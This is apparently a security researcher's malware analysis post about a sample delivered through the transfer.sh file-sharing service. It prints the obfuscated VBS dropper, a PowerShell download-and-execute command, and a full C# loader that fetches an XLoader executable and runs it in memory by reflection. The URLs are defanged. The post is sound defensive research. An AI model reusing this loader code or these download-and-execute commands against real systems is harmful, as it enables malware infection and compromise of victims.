File sharing is a classic operation performed by many people on a daily basis. If you can share files using big players like Dropbox or all the *Drive ("One", "Google", etc), there exists a lot of free alternatives that help to easily share files with peers. Because, still today, many organizations do not provide an "official" (read: promoted, supported, and monitored) service, users are always looking for alternatives. There are plenty of tools available like Lufi[1] or transfer.sh[2] (they are plenty of others). The sample that I spotted yesterday was delivered through the second one.

The initial payload was a gzip'd RAR archive (SHA256:949ce2559baa5021ac55523ece74c52bcf39b74d94352d9697b60594034c6dfc)

remnux@remnux:/MalwareZoo/20220323$ gzip -d -c Files.gz | file -
/dev/stdin: RAR archive data, v5
remnux@remnux:/MalwareZoo/20220323$ gzip -d Files.gz && unrar t Files

UNRAR 5.50 freeware      Copyright (c) 1993-2017 Alexander Roshal

Testing archive Files

Testing     COMPILLED LIST OF ITEMS.vbs                               OK 
Testing     Item's Specification & Drawings.vbs                       OK 
Testing     Company's Introduction.vbs                                OK 
All OK

All three files in the archive are the same. Here is the (beautified) code:

KKJDSKJDJKDSDSDSJKDSKJDSKDSKDKJSDKJSKDSKDSJKDSJKDSKJDSKDDKJEKJDKJDJKDKJDSJKDS = "W"&"s"&"c"&"r"&"i"&CHR(80)&"t."&"s"&"h"&CHR(69)&"l"&"l"
Set HFDJHDFSHJDFSHDFHDSHFDSHFHFHSHFKFHKFHSFHKFSHKFHKFHFFHDSFSHDFHSDFFHSSFHD = CreateObject(KKJDSKJDJKDSDSDSJKDSKJDSKDSKDKJSDKJSKDSKDSJKDSJKDS
KJDSKDDKJEKJDKJDJKDKJDSJKDS)
SJKHSKHSDKHHKSDSDKHSDKHHDSKDSHKHKDSDHKDSK = "PoWERsh"
HDFHKFDKHHKDFHKHDFHKK = "E"
GHDSHGDHDSKHDSKHDSKHDSHKDSKHDSDSKHDKSHKDSKHDSKHSDHDSKHDSHKDSHK = ""+SJKHSKHSDKHHKSDSDKHSDKHHDSKDSHKHKDSDHKDSK+HDFHKFDKHHKDFHKHDFHKK+"LL -exeC
utiO BYpASS -C  i`Ex( N`eW-oB`jEct neT.We`BcLi`ENt ).dOwNloadSTrinG('hxxps://transfer[.]sh/get/z16it2/rraammm.ps1') "
HFDJHDFSHJDFSHDFHDSHFDSHFHFHSHFKFHKFHSFHKFSHKFHKFHFFHDSFSHDFHSDFFHSSFHD.Run(GHDSHGDHDSKHDSKHDSKHDSHKDSKHDSDSKHDKSHKDSKHDSKHSDHDSKHDSHKDSHK),0

Pretty simple, it fetches the next payload through a share on transfer.sh.

hxxps://transfer[.]sh/get/z16it2/rraammm.ps1

The Powershell code is:

$whatever = "dXNpbmcgU3lzd ... (stuff deleted) ... b3NlKCk7fX19";
$dec = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String($whatever));
Add-Type -TypeDefinition $dec;
$instance = New-Object SKWTFPdZCH.DpGVQhBvSm.HqEHXQYiIxCnIoaXttSHgHoMU;
$instance.HxQcKKablTACrmEGBODiYOG
hW();

$whatever contains another payload used to inject the PE and execute it:

using System;using System.IO;using System.Net;
using System.Reflection;using System.Threading;
namespace SKWTFPdZCH.DpGVQhBvSm
{
  public class HqEHXQYiIxCnIoaXttSHgHoMU
  {
    private const string VhuixZgiqqTTIkrGvgRwUtDFE="hxxps://transfer[.]sh/get/ACEDn1/sdr.exe";
    private MemoryStream XaXaVkSGstrUmNTeLpgVnccuS=new MemoryStream();
    [STAThread]
    public void HxQcKKablTACrmEGBODiYOGhW()
    {
      gmrjNtqiFbYCZLoofQZiMGGJt();
      imYCaeLWaNVtuIupBojHByURJ();
    }
    private void imYCaeLWaNVtuIupBojHByURJ()
    {
      byte[]buffer=XaXaVkSGstrUmNTeLpgVnccuS.ToArray();
      Assembly assembly=null;
      if(Environment.Version.Major>=4)
      {
        MethodInfo method=Type.GetType("System.Reflection.RuntimeAssembly").GetMethod("nLoadImage",BindingFlags.NonPublic|BindingFlags.Static);
        assembly=(Assembly)method.Invoke(null,new object[]{buffer,null,null,null,false,false,null});
      } 
      else
      {
        MethodInfo method=Type.GetType("System.Reflection.Assembly").GetMethod("nLoadImage",BindingFlags.NonPublic|BindingFlags.Static);
        assembly=(Assembly)method.Invoke(null,new object[]{buffer,null,null,null,false});
      }
      object[]args=new object[1];
      if(assembly.EntryPoint.GetParameters().Length==0)
        args=null;
      assembly.EntryPoint.Invoke(null,args);
    }
    private void gmrjNtqiFbYCZLoofQZiMGGJt()
    {
      WebRequest request=WebRequest.Create(VhuixZgiqqTTIkrGvgRwUtDFE);
      WebResponse response=request.GetResponse();
      using(Stream web_stream=response.GetResponseStream())
      {
        byte[]buffer=new byte[8192];
        int read=0;
        while((read=web_stream.Read(buffer,0,buffer.Length))>0)
        {
          XaXaVkSGstrUmNTeLpgVnccuS.Write(buffer,0,read);
        }
      }
      response.Close();
    }
  }
}

The final payload (sdr.exe) is again downloaded from transfer.sh. It's an XLoader[3] sample.

It could be interesting to hunt for such file-sharing services in your logs... From a security point of view, Lufi is nice because all crypt/decrypt operations are performed on the client-side and the server does not see the content of shared files. However, this prevents files to be downloaded by headless browsers. transfer.sh is pretty simple and is, therefore, a nice solution for attackers! This technique is better for attackers because they don't have to compromise a website to drop their malicious content. Note that a Lufi instance could be perfectly used in a phishing campaign (via a link in the mail).

I'm running my own instance of Lufi as a honeypot and keeping an eye on it but, until now, it was never abused...

[1] https://framagit.org/fiat-tux/hat-softwares/lufi
[2] https://transfer.sh
[3] https://malpedia.caad.fkie.fraunhofer.de/details/osx.xloader

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key